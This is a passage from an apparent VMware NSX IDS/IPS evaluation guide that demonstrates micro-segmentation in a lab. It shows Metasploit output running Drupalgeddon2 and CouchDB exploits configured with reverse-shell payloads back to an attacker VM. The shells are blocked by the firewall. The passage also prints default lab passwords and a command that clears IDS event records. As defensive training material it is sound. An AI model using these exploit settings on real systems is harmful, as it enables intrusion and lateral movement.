208 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
209 | 2. Click on the **Application(1)** Category tab.
210 | 3. Click **ADD POLICY**
211 | 4. Click **New Policy** and change the name of the policy to **APP1 Micro-Segmentation**
212 | 5. Check the checkbox next to the **APP1 Micro-Segmentation** Policy
213 | 6. Click **ADD RULE** twice, and configure the new rules as per the below steps
214 | 7. Rule 1
215 | * Name: **WEB-TIER-ACCESS**
216 | * Source: **Any**
217 | * Destination: **APP1-WEB**
218 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
219 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
220 | * Applied To: **APP1-WEB**
221 | * Action: **Allow**
222 | 8. Rule 2
223 | * Name: **APP-TIER-ACCESS**
224 | * Source: **APP1-WEB**
225 | * Destination: **APP1-APP**
226 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
227 | * Applied To: **APP1-WEB** , **APP1-APP**
228 | * Action: **Allow**
229 | 9. Now that we have micro-segmented APP1, let's do the same for APP2. Click **ADD POLICY**
230 | 10. Click **New Policy** and change the name of the policy to **APP2 Micro-Segmentation**
231 | 11. Check the checkbox next to the **APP2 Micro-Segmentation** Policy
232 | 12. Click **ADD RULE** twice, and configure the new rules as per the below steps
233 | 13. Rule 1
234 | * Name: **WEB-TIER-ACCESS**
235 | * Source: **Any**
236 | * Destination: **APP2-WEB**
237 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
238 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
239 | * Applied To: **APP2-WEB**
240 | * Action: **Allow**
241 | 14. Rule 2
242 | * Name: **APP-TIER-ACCESS**
243 | * Source: **APP2-WEB**
244 | * Destination: **APP2-APP**
245 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
246 | * Applied To: **APP2-WEB** , **APP2-APP**
247 | * Action: **Allow**
248 | 15. We have now configured the appropriate allow-list policy for APP1 and APP2. Now we can change the default Distributed Firewall action from **Allow** to **Drop** in order to block all traffic except for the traffic we just allowed for our applications to function.
249 | 16. Click the down arrow next to the **Default Layer3 Section** Policy and change the action of the **Default Layer 3 rule** from **Allow** to **Drop**
250 | 17. Click **PUBLISH** to save and publish your changes.
251 |
252 | 
253 |
254 | ***Open a SSH/Console session to the External VM***
255 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
256 | * Username **vmware**
257 | * Password **VMware1!**
258 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
259 |
260 | ***Run through the lateral attack scenario (again)***
261 |
262 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM**, which will initiate the complete lateral attack scenario without needing any manual Metasploit steps. If you prefer, you can also manually go through these steps (see the chapter on the Lateral Movement Scenario)
263 |
264 | 1. Type **sudo ./attack2.sh** to run the attack scenario
265 |
266 | ```console
267 | vmware@ubuntu:~$ ./attack2.sh
268 | [sudo] password for vmware:
269 |
270 |
271 | Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
272 | EFLAGS: 00010046
273 | eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
274 | esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
275 | ds: 0018 es: 0018 ss: 0018
276 | Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
277 |
278 |
279 | Stack: 90909090990909090990909090
280 | 90909090990909090990909090
281 | 90909090.90909090.90909090
282 | 90909090.90909090.90909090
283 | 90909090.90909090.09090900
284 | 90909090.90909090.09090900
285 | ..........................
286 | cccccccccccccccccccccccccc
287 | cccccccccccccccccccccccccc
288 | ccccccccc.................
289 | cccccccccccccccccccccccccc
290 | cccccccccccccccccccccccccc
291 | .................ccccccccc
292 | cccccccccccccccccccccccccc
293 | cccccccccccccccccccccccccc
294 | ..........................
295 | ffffffffffffffffffffffffff
296 | ffffffff..................
297 | ffffffffffffffffffffffffff
298 | ffffffff..................
299 | ffffffff..................
300 | ffffffff..................
301 |
302 |
303 | Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
304 | Aiee, Killing Interrupt handler
305 | Kernel panic: Attempted to kill the idle task!
306 | In swapper task - not syncing
307 |
308 |
309 | =[ metasploit v5.0.95-dev ]
310 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
311 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
312 | + -- --=[ 7 evasion ]
313 |
314 | Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
315 |
316 | [*] Processing attack2.rc for ERB directives.
317 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
318 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
319 | resource (attack2.rc)> set RHOST 192.168.10.101
320 | RHOST => 192.168.10.101
321 | resource (attack2.rc)> set RPORT 8080
322 | RPORT => 8080
323 | resource (attack2.rc)> exploit -z
324 | [*] Started reverse TCP handler on 10.114.209.151:4444
325 | [*] Exploit completed, but no session was created.
326 | resource (attack2.rc)> route add 192.168.20.0/24 1
327 | [-] Not a session: 1
328 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
329 | [*] Using configured payload linux/x64/shell_reverse_tcp
330 | resource (attack2.rc)> set LPORT 4445
331 | LPORT => 4445
332 | resource (attack2.rc)> set LHOST 10.114.209.151
333 | LHOST => 10.114.209.151
334 | resource (attack2.rc)> set RHOST 192.168.20.100
335 | RHOST => 192.168.20.100
336 | resource (attack2.rc)> exploit -z
337 | [*] Started reverse TCP handler on 10.114.209.151:4445
338 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
339 | [*] Exploit completed, but no session was created.
340 | resource (attack2.rc)> set LPORT 4446
341 | LPORT => 4446
342 | resource (attack2.rc)> set RHOST 192.168.20.101
343 | RHOST => 192.168.20.101
344 | resource (attack2.rc)> exploit -z
345 | [*] Started reverse TCP handler on 10.114.209.151:4446
346 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
347 | [*] Exploit completed, but no session was created.
348 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) >
349 | ```
350 |
351 | 2. Type **sessions -l** to confirm that this time no reverse shell sessions were established.
352 |
353 | ```console
354 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
355 |
356 | Active sessions
357 | ===============
358 |
359 | No active sessions.
360 | ```
361 | > **Note**: The micro-segmentation policy allows the applications to function but reduces the attack surface by preventing any communication to a service that is not explicitly allowed. As a result, while the initial exploit against the vulnerable Drupal server was completed, no reverse shell was established, as the distributed firewall does not allow the APP1-WEB-TIER VM to establish a session to the external VM.
362 |
363 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
364 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
365 | 2. Confirm 2 signatures have fired:
366 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
367 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
368 |
369 | 
370 |
371 | > **Note**: While the initial DrupalGeddon exploit has completed, the distributed firewall has prevented the reverse shell from being established from APP-1-WEB-TIER. As a result, the attacker is unable to move laterally in the environment.
372 |
373 | This completes the NSX Distributed IDS/IPS PoV.
374 |
375 | ---
376 |
377 | [***Next Step: 10. Conclusion***](/docs/10-Conclusion.md)
378 |
--------------------------------------------------------------------------------
/docs/ClearingIDSEvents.md:
--------------------------------------------------------------------------------
1 |
2 | ## Clearing IDS Events from NSX Manager
3 | **For purposes of a demo or PoV, the below describes how IDS events can be cleared from NSX Manager**
4 |
5 |
6 |
7 | 1. Open your ssh client and initiate a session to NSX Manager. Login with the below credentials.
8 | * Username **root**
9 | * Password **VMware1!VMware1!**
10 | 2. Modify the IP address (**--host=10.114.209.149**) in the below command to match the IP address of your NSX Manager. Other values should not be changed.
11 | ```console
12 | service idps-reporting-service stop
13 | java -cp /usr/share/corfu/lib/corfudb-tools-0.3.0.20200817041804.3917-shaded.jar org.corfudb.browser.CorfuStoreBrowserMain --host=10.114.209.149 --port=9040 --namespace=security_data_service --tablename=ids_event_data --operation=dropTable --tlsEnabled=true --keystore=/config/cluster-manager/corfu/private/keystore.jks --ks_password=/config/cluster-manager/corfu/private/keystore.password --truststore=/config/cluster-manager/corfu/public/truststore.jks --truststore_password=/config/cluster-manager/corfu/public/truststore.password
14 | curl -X PUT -H "Content-Type: application/json" "localhost:9200/security_data_service_metadata/_doc/security_data_service?pretty" -d' {"clusterId" : "-1"}'
15 | service idps-reporting-service start
16 | ```
17 | 3. IDS events will now be cleared from the NSX manager and the reporting service will restart. This may take a few moments, but when you login to the NSX Manager UI, you should see the IDS events have been removed. You may have to refresh the UI/webpage a few times. You can now close the ssh session.
18 | ---
19 |
20 | ***Next Step: Continue with the next exercise in the PoV Guide***
21 |
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_1.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_10.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_10.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_11.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_11.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_12.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_12.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_13.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_13.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_14.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_14.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_15.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_15.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_16.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_16.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_17.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_17.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_18.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_18.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_19.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_19.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_2.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_20.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_20.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_21.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_21.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_22.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_22.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_23.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_23.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_24.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_24.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_25.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_25.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_26.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_26.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_27.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_27.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_27_SMALL.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_27_SMALL.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_28.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_28.gif
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_29.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_29.gif
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_3.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_30.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_30.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_31.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_31.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_32.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_32.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_33.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_33.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_34.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_34.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_35.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_35.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_36.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_36.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_37.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_37.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_38.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_38.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_39.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_39.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_4.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_4.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_40.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_40.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_41.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_41.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_42.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_42.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_43.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_43.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_44.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_44.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_45.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_45.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_46.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_46.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_5.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_5.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_6.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_6.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_7.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_7.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_8.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_8.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_9.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_9.PNG
--------------------------------------------------------------------------------
/docs/assets/images/NSX_Logo.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/NSX_Logo.jpeg
--------------------------------------------------------------------------------
/docs/assets/images/placeholder.tmp:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------